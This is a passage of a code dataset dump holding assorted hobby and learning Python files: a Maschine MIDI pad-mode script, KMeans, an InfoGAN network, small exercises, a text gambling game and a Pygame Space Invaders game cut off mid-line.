url(r'^(?P\\d+)/children', views.RetrieveChildrenComment.as_view(), name='children_comment'),\n\n]\n","repo_name":"wandeei/QA","sub_path":"comments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12211089602","text":"from copy import deepcopy\ndef game(g, size, field):\n # 방향 설정\n di = [-1,-1, -1, 0,0,1,1,1]\n dj = [-1,0,1,-1,1,-1,0,1]\n for _ in range(g-1):\n new = [[0 for _ in range(size)] for _ in range(size)] # 다음 세대 필드 초기 설정\n for i in range(size):\n for j in range(size):\n cnt = 0 # 갯수 저장하는 변수\n for k in range(8):\n fi , fj = i + di[k], j + dj[k] # 각 주위 방향\n if 0<=fi LAYOUT_ISO_3_CHROM:\n self._PadMode__layout = LAYOUT_SPREAD\n else:\n self._PadMode__layout = new_value\n self.canonical_parent.show_message(' Pad Layout: ' + LAYOUT_NAME[self._PadMode__layout] + ' / ' + self._current_scale_name(SCALES[self.current_scale_index]))\n self.update_transpose()\n\n def _current_scale_name(self, scale):\n return scale.name + ' ' + BASE_NOTE[self._base_note] + str(self._octave - 2)\n\n def inc_base_note(self, inc):\n new_value = self._base_note + inc\n if new_value < 0:\n new_value = 11\n self._octave = max(0, self._octave - 1)\n else:\n if new_value > 11:\n new_value = 0\n self._octave = self._octave + 1\n self._base_note = new_value\n scale = SCALES[self.current_scale_index]\n self.canonical_parent.show_message(' PAD Mode Scale: ' + self._current_scale_name(scale))\n self.update_transpose()\n\n def inc_octave(self, inc):\n new_value = self._octave + inc\n if new_value >= 0:\n if new_value < 8:\n self._octave = new_value\n scale = SCALES[self.current_scale_index]\n self.update_transpose()\n self.canonical_parent.show_message(' PAD Mode Scale: ' + self._current_scale_name(scale))\n\n def inc_scale(self, inc, update=True):\n nr_of_scales = len(SCALES) - 1\n prev_value = self.current_scale_index\n self.current_scale_index = min(nr_of_scales, max(0, self.current_scale_index + inc))\n if prev_value != self.current_scale_index:\n new_scale = SCALES[self.current_scale_index]\n self.canonical_parent.show_message(' PAD Mode Scale: ' + self._current_scale_name(new_scale))\n if update:\n self.update_transpose()\n\n def get_octave(self):\n return SCALES[self.current_scale_index].to_octave(self._octave)\n\n def update_transpose(self):\n if self._active:\n self.clear_transpose()\n self.assign_transpose(SCALES[self.current_scale_index])\n 
self.canonical_parent._set_suppress_rebuild_requests(True)\n self.canonical_parent.request_rebuild_midi_map()\n self.canonical_parent._set_suppress_rebuild_requests(False)\n\n def fitting_mode(self, track):\n if not track:\n return self\n drum_device = find_drum_device(track)\n if drum_device is not None:\n if self._alternate_mode is not None:\n return self._alternate_mode\n return self\n\n def refresh(self):\n if self._active:\n matrix = self.canonical_parent.get_button_matrix()\n matrix.prepare_update()\n for button, (_, _) in matrix.iterbuttons():\n if button:\n button.send_value(0, True)\n\n matrix.commit_update()\n\n def get_in_notes(self):\n cs = self.song().view.highlighted_clip_slot\n if cs.has_clip:\n if cs.clip.is_midi_clip:\n in_notes = set()\n notes = cs.clip.get_notes_extended(0, 127, 0.0, cs.clip.length)\n for note in notes:\n in_notes.add(note.pitch)\n\n return in_notes\n\n def clear_transpose(self):\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.set_to_notemode(False)\n button.remove_value_listener(self.handle_button)\n\n def assign_transpose(self, scale):\n assert isinstance(scale, PadScale)\n self._scale = scale\n if self._active:\n matrix = self.canonical_parent.get_button_matrix()\n self.layout_normal(matrix)\n\n def layout_normal(self, matrix):\n matrix.prepare_update()\n scale_len = len(self._scale.notevalues)\n octave = self._octave\n for button, (column, row) in matrix.iterbuttons():\n if button:\n if button.state == 0:\n button.remove_value_listener(self._dummy_lister)\n elif self._PadMode__layout == LAYOUT_SPREAD:\n note_index = (7 - row) * 8 + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_3_INKEY:\n note_index = (7 - row) * (self.current_scale_index == 0 and 4 or 2) + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_4_INKEY:\n note_index = (7 - row) * (self.current_scale_index == 0 and 5 or 3) + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_3_CHROM:\n note_index = (7 - row) * 4 + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_4_CHROM:\n note_index = (7 - row) * 5 + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_3_CHROM or self._PadMode__layout == LAYOUT_ISO_4_CHROM:\n scale_index = note_index % 12\n octave_offset = note_index // 12\n note_value = SCALES[0].notevalues[scale_index] + self._base_note + octave * 12 + octave_offset * 12\n scale_index = note_index % scale_len\n octave_offset = note_index // scale_len\n note_value = self._scale.notevalues[scale_index] + self._base_note + octave * 12 + octave_offset * 12\n if note_value < 128:\n button.set_to_notemode(True)\n button.set_send_note(note_value)\n button.state = 1\n button.send_value(0, True)\n else:\n button.set_send_note(button.get_identifier())\n button.set_to_notemode(False)\n button.state = 0\n button.add_value_listener(self._dummy_lister)\n button.send_color_direct(0)\n\n matrix.commit_update()\n\n def auto_select(self):\n return True\n\n def _dummy_lister(self, value):\n pass\n\n def set_modifier_component(self, component):\n self._PadMode__modifier_component = component\n\n def handle_shift(self, shift_value):\n if shift_value:\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.set_to_notemode(False)\n button.add_value_listener(self.handle_button, True)\n\n else:\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.remove_value_listener(self.handle_button)\n\n self.update_transpose()\n\n def 
__determine_focus_track(self):\n return self.song().view.selected_track\n\n def handle_button(self, value, button):\n if value != 0:\n col, row = button.get_position()\n if row == 0:\n self._PadMode__modifier_component.handle_edit_action(col)\n\n @subject_slot('selected_track')\n def on_track_changed(self):\n self._focus_track = self._PadMode__determine_focus_track()\n self.refresh()\n\n def enter(self):\n self._active = True\n self._focus_track = self._PadMode__determine_focus_track()\n self.on_track_changed.subject = self.song().view\n matrix = self.canonical_parent.get_button_matrix()\n for button, (_, _) in matrix.iterbuttons():\n if button:\n button.set_to_notemode(True)\n self.canonical_parent._forwarding_registry[(MIDI_NOTE_ON_STATUS, button.get_identifier())] = button\n self.canonical_parent._forwarding_registry[(MIDI_NOTE_OFF_STATUS, button.get_identifier())] = button\n\n self.update_transpose()\n\n def exit(self):\n self._active = False\n self.on_track_changed.subject = None\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.set_to_notemode(False)\n button.remove_value_listener(self.handle_button)\n# okay decompiling src/PadMode.pyc\n","repo_name":"frankois/ni","sub_path":"midi_remote_scripts/maschine/maschine_jam/scripts/PadMode.py","file_name":"PadMode.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"29770715525","text":"#This program reverse the key-value pair of a dictionary assuming the values are non unique\r\n\r\n#This function converts the string to a dictionary where the key if the letter and the value is the number of times it appears \r\ndef dictionary(s):\r\n d=dict()\r\n for letter in s:\r\n if letter not in d:\r\n d[letter]=1\r\n else:\r\n d[letter]+=1\r\n return d\r\n\r\n#This function reverse the dicitonary for non-unique values\r\ndef inverse_Dictionary(d):\r\n inverse=dict()\r\n for k, v in d.items(): #d.items() fetches all key-value pairs\r\n inverse[v] = inverse.get(v, []) + [k] #dictionary_name.get() is an in-built function that takes a key and a defualt value and returns the corresponding value\r\n return inverse\r\n\r\n\r\n#Main function\r\ns=input(\"Enter the string:\")\r\nd=dictionary(s)\r\nprint(\"The letters and the number of times it is repeated are:\")\r\nprint(d)\r\n\r\nprint(\"The inverse of this dictionary is:\")\r\nnewd=inverse_Dictionary(d)\r\nprint(newd)\r\n","repo_name":"BVarunRaju/Learning_Python","sub_path":"Level_Beginner/Dictionary/Dictionary_and_List.py","file_name":"Dictionary_and_List.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27613028922","text":"from csv_helper import CSVHelper\nfrom functools import reduce\nfrom textblob import TextBlob as tb #text Bynary Large Object\n\n\ndef tf(word, blob): # fuction to count te term frecuency.\n return blob.words.count(word) / len(blob.words)\n\ndef n_containing(word, bloblist): # count the word ocurance in the document list.\n return sum(1 for blob in bloblist if word in blob)\n\ndata = CSVHelper.load_csv(\"dbscan_results.csv\")\n\ntweets = CSVHelper.load_csv(\"clean_tweets.csv\")\ntweetOrdered = list(map(lambda x: x.split(','), tweets))\n\n#Get real clean tweets\nlistDoc = []\nfor cluster in data:\n sub =[]\n cluster = [int(item) for item in cluster if (item != ',' and item != ' ')]\n for t in cluster:\n 
sub.append(tb(tweetOrdered[int(t)][1].strip()))\n listDoc.append(sub)\n\n\n\nresultWords = []\nfor x,cluster in enumerate(listDoc):\n scores = {}\n blobList = reduce(lambda x,y: x+y,cluster)\n print(len(cluster))\n for i, blob in enumerate(cluster):\n print(i)\n scores = {word: tf(word, blobList) for word in blob.words}\n sorted_words = sorted(scores.items(), key=lambda x: x[1], reverse=True)\n resultWords.append({'cluster'+str(x): sorted_words[0][0]})\n print(sorted_words)\n\nprint(resultWords)\n\n\n \n","repo_name":"juancho618/data_analysis","sub_path":"bestWord.py","file_name":"bestWord.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35588854716","text":"import heapq\n\ndef solution(scoville, K):\n \n cnt = 0\n heapq.heapify(scoville)\n\n while len(scoville)>=2:\n a = heapq.heappop(scoville)\n b = heapq.heappop(scoville)\n c = a+2*b\n heapq.heappush(scoville, c)\n cnt += 1 # 1회 섞었음\n \n if scoville[0] >= K: # 제일 안매운게 K 이상이면\n break # 종료\n\n if scoville[0] >= K: # 하나남아도, K보다 매우면\n return cnt\n else: # 하나남았는데 K보다 덜 매우면\n return -1\n\n# [1, 2, 3, 9, 10, 12]\t7\t2\nprint(solution([1, 2, 3, 9, 10, 12],7))\n","repo_name":"agilestar8/coding-test-","sub_path":"프로그래머스 lv2/더 맵게.py","file_name":"더 맵게.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19584758789","text":"# You are given an integer N followed by N email addresses. Your task is to print a list containing only valid email\n# addresses in lexicographical order.\n\n# Valid email addresses must follow these rules:\n# It must have the username@websitename.extension format type.\n# The username can only contain letters, digits, dashes and underscores.\n# [a-z], [A-Z],[0-9],[-].\n# The website name can only have letters and digits [a-z], [A-Z],[0-9].\n# The extension can only contain letters [a-z], [A-Z].\n# The maximum length of the extension is 3.\n\n# Sample input\n# 3\n# lara@hackerrank.com\n# brian-23@hackerrank.com\n# britts_54@hackerrank.com\n\n# Sample output\n# ['brian-23@hackerrank.com', 'britts_54@hackerrank.com', 'lara@hackerrank.com']\n\n\nimport re\n\n\ndef fun(s):\n regex = r\"^([a-zA-Z0-9-_]+)@([a-zA-Z0-9]+)\\.([a-zA-Z]{,3})$\"\n if re.fullmatch(regex, s):\n return bool\n\n\ndef filter_mail(emails):\n return list(filter(fun, emails))\n\n\nn = int(input(\"Enter a number: \"))\nemails = []\nfor _ in range(n):\n emails.append(input(\"Enter a email: \"))\n\nfiltered_emails = filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)\n\n\n","repo_name":"chiragpys/python","sub_path":"HackerRank/36_Validating_Email_Addresses_With_Filter.py","file_name":"36_Validating_Email_Addresses_With_Filter.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22698640922","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Generator(nn.Module):\n def __init__(self, db='mnist', z_dim=128, cc_dim=1, dc_dim=10):\n super(Generator, self).__init__()\n self.db = db\n\n if self.db == 'mnist':\n self.fc = nn.Sequential(\n nn.Linear(z_dim + cc_dim + dc_dim, 1024),\n nn.BatchNorm2d(1024),\n nn.ReLU(),\n\n nn.Linear(1024, 128*7*7),\n nn.BatchNorm2d(128*7*7),\n nn.ReLU()\n )\n self.conv = nn.Sequential(\n # [-1, 128, 7, 7] -> [-1, 64, 14, 14]\n nn.ConvTranspose2d(128,64,4,2,1),\n nn.BatchNorm2d(64),\n 
nn.ReLU(),\n\n # -> [-1, 1, 28, 28]\n nn.ConvTranspose2d(64,1,4,2,1),\n nn.Tanh()\n )\n else:\n self.main = nn.Sequential(\n # [-1, z + cc + dc, 1, 1] -> [-1, 512, 4, 4]\n nn.ConvTranspose2d(z_dim + cc_dim + dc_dim, 1024, 4, 1, 0),\n\n nn.ConvTranspose2d(1024, 512, 4, 2, 1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n\n # [-1, 256, 8, 8]\n nn.ConvTranspose2d(512, 256, 4, 2, 1),\n nn.BatchNorm2d(256),\n nn.ReLU(),\n\n # [-1, 128, 16, 16]\n nn.ConvTranspose2d(256, 128, 4, 2, 1),\n nn.BatchNorm2d(128),\n nn.ReLU(),\n\n # [-1, 3, 32, 32]\n nn.ConvTranspose2d(128, 3, 4, 2, 1),\n nn.Tanh()\n )\n\n def forward(self, z):\n if self.db == 'mnist':\n # [-1, z]\n z = self.fc( z )\n\n # [-1, 128*7*7] -> [-1, 128, 7, 7]\n z = z.view(-1, 128, 7, 7)\n out = self.conv(z)\n else:\n # [-1, z] -> [-1, z, 1, 1]\n z = z.view(z.size(0), z.size(1), 1, 1)\n out = self.main( z )\n\n return out\n\n\nclass Discriminator(nn.Module):\n def __init__(self, db='mnist', cc_dim = 1, dc_dim = 10):\n super(Discriminator, self).__init__()\n self.db = db\n self.cc_dim = cc_dim\n self.dc_dim = dc_dim\n\n if self.db=='mnist':\n self.conv = nn.Sequential(\n # [-1, 1, 28, 28] -> [-1, 64, 14, 14]\n nn.Conv2d(1, 64, 4, 2, 1),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 128, 7, 7]\n nn.Conv2d(64, 128, 4, 2, 1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.1, inplace=True),\n )\n self.fc = nn.Sequential(\n nn.Linear(128*7*7, 128),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(0.1, inplace=True),\n nn.Linear(128, 1 + cc_dim + dc_dim)\n )\n else:\n self.main = nn.Sequential(\n # [-1, 3, 32, 32] -> [-1, 128, 16, 16]\n nn.Conv2d(3, 128, 4, 2, 1),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 256, 8, 8]\n nn.Conv2d(128, 256, 4, 2, 1),\n nn.BatchNorm2d(256),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 512, 4, 4]\n nn.Conv2d(256, 512, 4, 2, 1),\n nn.BatchNorm2d(512),\n nn.LeakyReLU(0.1, inplace=True),\n\n nn.Conv2d(512, 1024, 4, 2, 1),\n nn.BatchNorm2d(1024),\n nn.LeakyReLU(0.1, inplace=True),\n\n # [-1, 1 + cc_dim + dc_dim, 1, 1]\n nn.Conv2d(1024, 1 + cc_dim + dc_dim, 4, 1, 0)\n )\n\n def forward(self, x):\n if self.db == 'mnist':\n # -> [-1, 128*7*7]\n tmp = self.conv(x).view(-1, 128*7*7)\n\n # -> [-1, 1 + cc_dim + dc_dim]\n out = self.fc(tmp)\n else:\n # -> [-1, 1 + cc_dim + dc_dim]\n out = self.main(x).squeeze()\n\n # Discrimination Output\n out[:, 0] = F.sigmoid(out[:, 0].clone())\n\n # Continuous Code Output = Value Itself\n # Discrete Code Output (Class -> Softmax)\n out[:, self.cc_dim + 1:self.cc_dim + 1 + self.dc_dim] = F.softmax(out[:, self.cc_dim + 1:self.cc_dim + 1 + self.dc_dim].clone())\n\n return out\n","repo_name":"Hadar-Sha/Deep-Learning","sub_path":"pytorch/tutorials/infoGan_network.py","file_name":"infoGan_network.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8761985058","text":"import random\nimport numpy as np\nimport src\n\n\n\nclass KMEANS:\n def __init__(self, k=5, max_iterations=300):\n self.k = k\n self.max_iterations = max_iterations\n\n def fit(self, data):\n self.centroids = {}\n\n # инициализируем центроиды\n for i in range(self.k):\n self.centroids[i] = data[random.randint(0, len(data)-1)]\n\n # делаем max_iterations итераций поиска\n for i in range(self.max_iterations):\n self.clusters = {}\n for j in range(self.k):\n self.clusters[j] = []\n\n # найдем расстояния от точек до центроидов\n for dot in data:\n distances = [np.linalg.norm(dot - self.centroids[centroid]) for centroid in self.centroids]\n bestCluster = 
distances.index(min(distances))\n self.clusters[bestCluster].append(dot)\n\n # пересчитаем центроиды(центр масс)\n for cluster in self.clusters:\n self.centroids[cluster] = np.average(self.clusters[cluster], axis=0)\n\n # добавить условие останова : максимальное расстояние от новых центров до старых меньше эпсилон\n\n def predict(self, data):\n distances = [np.linalg.norm(data - self.centroids[centroid]) for centroid in self.centroids]\n classsification = distances.index(min(distances))\n return classsification\n\n\ndef main():\n data = src.X2\n xlabel, ylabel, title = 'Income', 'Score', 'KMeans'\n kmeans = KMEANS(4)\n kmeans.fit(data)\n labels = [kmeans.predict(data[i]) for i in range(len(data))]\n centroids = [kmeans.centroids[i] for i in range(len(kmeans.centroids))]\n src.plotClusters(data, labels, centroids, '2d', xlabel, ylabel, title)\n src.metrics(data, centroids, labels)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mefistofel666/Clustering-Algorithms","sub_path":"kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12081926506","text":"# games 2020\n\nimport random\n\nmoney = 100 # money that the player starts with\n\nprint(\"Games: coinflip, cho han, cards\") # initial greetings\nprint(\"You start with $100\")\n\ndef vibe_check(): # function that checks how much money the player has, exits if money <= 0\n\n global money # money must be a global variable to play with it in a function\n\n if money <= 0:\n print(\"You don't have enough money to play! Goodbye.\")\n exit() # exits the game if the player doesn't have enough cash\n else:\n print(\"You have $\" + str(money) + \" to play with.\") # if the player has enough $, prints the amount\n\ndef coin_flip(guess, bet): # coin flipping game that checks guess and bet\n\n global money\n\n num = random.randint(1,2) # 1 = heads, 2 = tails\n\n if guess == \"heads\":\n guess = 1\n elif guess == \"tails\":\n guess = 2\n else:\n main()\n\n if num == guess and num == 1:\n print(\"You flipped heads, you win! $\" + str(bet) + \" will be added to your money.\")\n money += bet\n main()\n elif num == guess and num == 2:\n print(\"You flipped tails, you win! $\" + str(bet) + \" will be added to your money.\")\n money += bet\n main()\n else:\n print(\"You guessed incorrectly! $\" + str(bet) + \" will be subtracted from your money.\")\n money += (-bet)\n main()\n\ndef cho_han(guess, bet):\n\n global money\n\n num1 = random.randint(1,6)\n num2 = random.randint(1,6)\n\n if guess == \"odd\" and num1 + num2 % 2 != 0:\n print(\"You guessed odd, you win! $\" + str(bet) + \" will be added to your money.\")\n money += (bet)\n main()\n elif guess == \"odd\" and num1 + num2 % 2 == 0:\n print(\"You guessed incorrectly! $\" + str(bet) + \" will be subtracted from your money.\")\n money += (-bet)\n main()\n elif guess == \"even\" and num1 + num2 % 2 == 0:\n print(\"You guessed even, you win! $\" + str(bet) + \" will be added to your money.\")\n money += bet\n main()\n elif guess == \"even\" and num1 + num2 % 2 != 0:\n print(\"You guessed incorrectly! 
$\" + str(bet) + \" will be subtracted from your money.\")\n money += (-bet)\n main()\n else:\n main()\n\ndef cards(bet):\n\n global money\n\n num1 = random.randint(1,52)\n num2 = random.randint(1,52)\n opp_bet = random.randint(1,100)\n\n print(\"Opponent bets $\" + str(opp_bet))\n\n if num1 > num2:\n money += bet\n money += opp_bet\n print(\"You picked a card higher than your opponent! $\" + str(bet) + \" and $\" + str(opp_bet) + \" will be added to your money.\")\n main()\n elif num1 < num2:\n money += (-bet)\n money += (-opp_bet)\n print(\"Your opponent picked a higher card, you lose $\" + str(bet) + \" and $\" + str(opp_bet))\n main()\n else: # if num1 isn't bigger than num2 and visa versa, they must be equal\n print(\"You and your opponent picked the same card! Tie game!\")\n main()\n\ndef main():\n\n input1 = input(\"Enter a game to play: \")\n\n if input1 == \"exit\":\n print(\"Good game! You ended with $\" + str(money) + \".\")\n exit()\n elif input1 == \"money\":\n print(\"You have $\" + str(money))\n main()\n elif input1 == \"coinflip\":\n input2 = input(\"Heads or tails: \")\n input3 = int(input(\"Enter bet: \"))\n vibe_check()\n coin_flip(input2, input3)\n elif input1 == \"cho han\":\n input2 = input(\"Odd or even: \")\n input3 = int(input(\"Enter bet: \"))\n vibe_check()\n cho_han(input2, input3)\n elif input1 == \"cards\":\n input2 = int(input(\"Enter bet: \"))\n vibe_check()\n cards(input2)\n else:\n main()\nmain()\n\ndef exit():\n print(\"\")\n","repo_name":"tornattj/games","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":3717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34740423272","text":"import sys\nfrom datetime import date, datetime, time\n\n\ndef usage():\n print(f\"Usage: {sys.argv[0]} -d \\\"yyyy-mm-dd\\\"\")\n\n\nif len(sys.argv) != 4 or sys.argv[2] != '-d':\n usage()\n exit(1)\n\n\nallCookies = {}\n\ncookie_log = open(sys.argv[1], \"r\")\n\ndate_time = datetime.strptime(sys.argv[3], \"%Y-%m-%d\")\n\nfor cur in cookie_log.readlines():\n cookie, timestamp = cur.split(\",\")\n timestamp = timestamp.replace(\"\\n\", \"\")\n tmp_datetime = datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S%z')\n if date_time.strftime('%Y-%m-%d') == tmp_datetime.strftime('%Y-%m-%d'):\n if cookie in allCookies:\n allCookies[cookie] += 1\n else:\n allCookies[cookie] = 1\n\n\nx = max(allCookies.values(), key= lambda x: x)\n\nfor cookie, y in allCookies.items():\n if y == x:\n print(cookie)\n\ncookie_log.close()","repo_name":"keshut/MostActiveCookie","sub_path":"Cookies.py","file_name":"Cookies.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22137563455","text":"import pygame\r\nimport os\r\nimport random\r\nfrom pygame import mixer\r\nimport tkinter.messagebox as tmsg\r\n\r\n# It will initialize Pygame\r\n# To access all of it's methods and features\r\npygame.init()\r\n\r\n# Display Screen\r\n# Width = 800\r\n# Height = 600\r\ngame_screen = pygame.display.set_mode((800, 600))\r\n\r\n# Title of the Game Window\r\npygame.display.set_caption(\"Space Invaders\")\r\n\r\nSupporting_Files_Missing = False\r\n\r\n# Icon of the Game window\r\ntry:\r\n GameWindow_Icon = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Game_Screen_Icon.png\")) # Icon Object\r\nexcept:\r\n Supporting_Files_Missing = True\r\npygame.display.set_icon(GameWindow_Icon) # Set Icon\r\n\r\n# Space 
Background\r\ntry:\r\n SpaceBackground_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Space.jpg\")) # Image Size 800 X 600\r\nexcept:\r\n Supporting_Files_Missing = True\r\n\r\n# Spaceship Image\r\ntry:\r\n SpaceShip_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\SpaceShip.png\")) # Image Size 64 x 64\r\nexcept:\r\n Supporting_Files_Missing = True\r\n# X and Y co-ordinate supposed to be the top left corner of the Image\r\n# Trying to place the Spaceship Image at Exactly Middle at Bottom\r\n# X supposed to be Middle\r\n# Y supposed to be little up from bottom\r\nSpaceShip_Pos_X = 368 # 800/2 => 400 - (64/2) => 368\r\nSpaceShip_Pos_Y = 520 # 600 - 64 + 16 (little up from exact bottom) => 536\r\n\r\n# Alien Image\r\nNumber_of_Aliens = 5\r\nAliens_Image = []\r\nAliens_Pos_X = []\r\nAliens_Pos_Y = []\r\nMove_To_Right = []\r\nMove_To_Left = []\r\n\r\nfor Alien in range(Number_of_Aliens):\r\n try:\r\n Aliens_Image.append(pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Alien.png\"))) # Image Size 64 x 64\r\n except:\r\n Supporting_Files_Missing = True\r\n # Enemy will appear in different positions\r\n Aliens_Pos_X.append(random.randint(0,736))\r\n Aliens_Pos_Y.append(random.randint (10, 100))\r\n Move_To_Right.append(True)\r\n Move_To_Left.append(False)\r\n\r\n# Bullet Image\r\ntry:\r\n Bullet_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Bullet.png\")) # Image Size 32 x 32\r\nexcept:\r\n Supporting_Files_Missing = True\r\nBullet_Pos_X = 0\r\nBullet_Pos_Y = 0\r\n\r\n# Explosion Image\r\ntry:\r\n Explosion_Image = pygame.image.load(os.path.join(os.getcwd(), \"Supporting_Images\\\\Explosion.png\")) # Image Size 32 x 32\r\nexcept:\r\n Supporting_Files_Missing = True\r\n\r\n# Need to draw the space background over game screen\r\ndef drawSpaceBackground():\r\n game_screen.blit(SpaceBackground_Image, (0,0))\r\n\r\n# Need to draw the spaceship over game screen\r\ndef drawSpaceShip(pos_X, pos_Y):\r\n game_screen.blit(SpaceShip_Image, (pos_X, pos_Y))\r\n\r\n# Need to draw the Alien over game screen\r\ndef drawAlien(Alien_Image, pos_X, pos_Y):\r\n game_screen.blit(Alien_Image, (pos_X, pos_Y))\r\n\r\n# Need to draw the Bullet over game screen\r\ndef drawBullet(pos_X, pos_Y):\r\n game_screen.blit(Bullet_Image, (pos_X, pos_Y))\r\n\r\n# Check if collision happend in between current bullet and Enemy\r\ndef detectCollision(bullet_X, bullet_y, alien_x, alien_y):\r\n if (bullet_X >= alien_x+3 and bullet_X <= alien_x+64-3) and (bullet_y <= alien_y+64-3 and bullet_y >= alien_y+3):\r\n game_screen.blit(Explosion_Image, (alien_x, alien_y)) # Draw Explosion Image\r\n return True # Collision Happened\r\n else:\r\n return False\r\n\r\n# Check If Alien enterd into Spaceship Zone\r\ndef AlienEnterdIntoSpaceshipArea(Aliens_Pos, SpaceShip_Pos):\r\n if Aliens_Pos >= SpaceShip_Pos:\r\n return True\r\n else:\r\n return False\r\n\r\n# Variable to Detect if Game is running\r\nGame_ON = True\r\nGame_Over = False\r\nBullet_can_be_Fired = False\r\nBullet_is_on_Screen = False\r\nEnemy_is_Killed = False\r\n\r\n# Player Score\r\nPlayer_Score = 0\r\n# Player score Font\r\ntry:\r\n Player_Score_Font = pygame.font.Font(os.path.join(os.getcwd(), \"Supporting_Images\\\\OpenSans-Regular.ttf\"), 24)\r\nexcept:\r\n Supporting_Files_Missing = True\r\n# Game Over Message Font\r\ntry:\r\n GameOverMessage_Font = pygame.font.Font(os.path.join(os.getcwd(), \"Supporting_Images\\\\OpenSans-Regular.ttf\"), 64)\r\nexcept:\r\n Supporting_Files_Missing = 
True\r\n\r\n# Bullet Sound\r\ntry:\r\n Bullet_Sound = mixer.Sound(\"Supporting_Images\\\\Bullet_Sound.wav\")\r\nexcept:\r\n Supporting_Files_Missing = True\r\n# Explosion Sound\r\ntry:\r\n Explosion_Sound = mixer.Sound(\"Supporting_Images\\\\Explosion.wav\")\r\nexcept:\r\n Supporting_Files_Missing = True\r\n\r\n# Show Player score\r\ndef showPlayerScore(Score_value):\r\n # Render Message\r\n scoreMassage = Player_Score_Font.render(f\"Score : {Score_value}\", True, (255, 255, 255))\r\n game_screen.blit(scoreMassage, (10, 10))\r\n\r\n# Show Game Over Message\r\ndef GameOverMessage():\r\n # Render Message\r\n GameOverMassage = GameOverMessage_Font.render(f\"Game Over\", True, (255, 255, 255))\r\n game_screen.blit(GameOverMassage, (200, 250))\r\n\r\n# Show Supporting File Issue Message\r\ndef SupportingFileIssueMessage():\r\n pygame.font.init()\r\n SupportingFileIssue_Font = pygame.font.SysFont('Comic Sans MS', 64)\r\n # Render Message\r\n SupportingFileIssueMassage = SupportingFileIssue_Font.render(f\"Supporting File Missing\", True, (255, 0, 0))\r\n game_screen.blit(SupportingFileIssueMassage, (50, 250))\r\n\r\n# Start Game\r\nwhile Game_ON:\r\n # Set color for Window\r\n # We always to to fill color first. If needed\r\n # Rest of the Images which supposed to be drawn should come over the fill screen\r\n game_screen.fill((0, 0, 0)) # RGB value. Now set to Black\r\n\r\n # If Supporting Files are not missing\r\n if Supporting_Files_Missing == False:\r\n # Draw space background on each frame\r\n drawSpaceBackground()\r\n\r\n if Game_Over == False:\r\n # During game is active\r\n # Pygame will full of continuous Events\r\n # At each moment we should capture which all events are going on\r\n # Based on that we should control the Game\r\n for event in pygame.event.get(): # Capture all the events at every moment\r\n if event.type == pygame.QUIT: # Pressed close button of the screen window\r\n Game_ON = False # Game screen is closed\r\n\r\n if event.type == pygame.KEYDOWN: # KEYDOWN means some key from keyboard is presses. It will true until we are not releasing finger from the key\r\n # Check which particular key is pressed\r\n if event.key == pygame.K_LEFT: # Left arrow key is pressed\r\n if SpaceShip_Pos_X >= 10: # Ensure that Spaceship is not moved out from screen\r\n SpaceShip_Pos_X -= 10\r\n if event.key == pygame.K_RIGHT: # Right arrow pressed\r\n if SpaceShip_Pos_X <= 790-64: # Ensure that Spaceship is not moved out from screen\r\n SpaceShip_Pos_X += 10\r\n if event.key == pygame.K_SPACE: # Fire Bullet if No Bullet is on Screen. 
